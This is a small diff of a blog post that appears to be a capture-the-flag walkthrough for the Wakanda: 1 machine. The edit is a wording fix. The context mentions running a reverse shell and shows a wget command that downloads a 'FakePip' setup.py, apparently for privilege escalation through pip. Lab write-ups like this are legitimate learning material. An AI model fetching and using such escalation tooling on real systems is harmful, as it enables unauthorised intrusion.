szorfein/szorfein.github.io/_posts/2018-09-24-CTF-wakanda-1.md

 Unfortunately, we can't write on this file to execute a reverse shell.

-After googling sometimes, we can use `fakepip`.
+After googling thoroughly, we can use `fakepip`.
 Download the file from [fakepip](wget https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py)

     $ wget -cv https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py